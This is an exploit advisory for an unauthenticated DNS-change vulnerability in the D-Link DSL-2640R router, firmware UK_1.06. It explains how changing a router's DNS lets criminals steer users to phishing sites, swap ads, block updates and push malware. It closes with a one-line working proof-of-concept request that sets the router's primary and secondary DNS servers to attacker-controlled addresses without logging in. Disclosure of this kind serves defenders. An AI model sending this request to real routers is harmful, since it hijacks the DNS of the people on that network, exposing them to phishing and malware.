D-Link DSL-2640R Unauthenticated Remote DNS Changer

`#  
#  
# D-Link DSL-2640R Unauthenticated Remote DNS Change Vulnerability  
#  
# Firmware Version: UK_1.06 Hardware Version: B1  
#  
# Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>  
#  
# https://ethical-hacker.org/  
# https://facebook.com/ethicalhackerorg/  
#  
# Description:   
# The vulnerability exist in the web interface.  
# D-Link's various routers are susceptible to unauthorized DNS change.   
# The problem is when entering an invalid / wrong user and password.   
#  
# ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link   
# DEVICES MAY AFFECTED.  
#  
# Once modified, systems use foreign DNS servers, which are   
# usually set up by cybercriminals. Users with vulnerable   
# systems or devices who try to access certain sites are   
# instead redirected to possibly malicious sites.  
#   
# Modifying systems' DNS settings allows cybercriminals to   
# perform malicious activities like:  
#  
# o Steering unknowing users to bad sites:   
# These sites can be phishing pages that   
# spoof well-known sites in order to   
# trick users into handing out sensitive   
# information.  
#  
# o Replacing ads on legitimate sites:   
# Visiting certain sites can serve users   
# with infected systems a different set   
# of ads from those whose systems are   
# not infected.  
#   
# o Controlling and redirecting network traffic:   
# Users of infected systems may not be granted   
# access to download important OS and software   
# updates from vendors like Microsoft and from   
# their respective security vendors.  
#  
# o Pushing additional malware:   
# Infected systems are more prone to other   
# malware infections (e.g., FAKEAV infection).  
#  
#   
  
Proof of Concept:  
  
http://<TARGET>/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=<MALICIOUS DNS>&dnsSecondary=<MALICIOUS DNS>  
`